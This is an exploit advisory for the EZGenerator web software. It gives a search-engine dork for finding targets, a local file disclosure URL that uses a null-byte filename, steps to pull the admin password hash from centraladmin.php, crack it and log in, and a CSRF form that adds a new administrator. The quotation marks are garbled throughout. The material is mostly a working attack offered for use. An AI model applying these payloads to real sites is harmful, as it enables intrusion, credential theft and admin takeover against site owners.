EZGenerator ? Local File Disclosure/Admin Data/CSRF Vulnerability ================================================================= #################################################################### .:. Author : AtT4CKxT3rR0r1ST .:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com] .:. Home : http://www.iphobos.com/blog/ .:. Dork : inurl:?utils.php?action= inurl:?centraladmin.php?process=? (gR34?$ T0 mY L0V3) #################################################################### ===[ Exploit ]=== Local File Disclosure: ===================== www.site.com/utils.php?action=download&filename=file.php%00 Admin Data =========== 1-download centraladmin.php via exploit file discloure [www.site.com/utils.php?action=download&filename=centraladmin.php%00] 2-when download file found it $ca_admin_username=?admin?; $ca_admin_pwd=?c89f9f4ef264e22001f9a9c3d72992ef?; 3-crack hash and join 4-admin panel: www.site.com/centraladmin.php CSRF [Add Admin]: ================ <form method=?POST? name=?form0? action=? http://site/centraladmin.php?process=processuser?> <input type=?hidden? name=?flag? value=?add?/> <input type=?hidden? name=?old_username? value=?"/> <input type=?hidden? name=?username? value=?admin?/> <input type=?hidden? name=?name? value=?mm?/> <input type=?hidden? name=?sirname? value=?hh?/> <input type=?hidden? name=?email? value=?email@live.com?/> <input type=?hidden? name=?password? value=?12121212?/> <input type=?hidden? name=?repeatedpassword? value=?12121212?/> <input type=?hidden? name=?select_all? value=?yes?/> <input type=?hidden? name=?access_to_page47? value=?2?/> <input type=?hidden? name=?save? value=?Save?/> </form> </body> </html> ####################################################################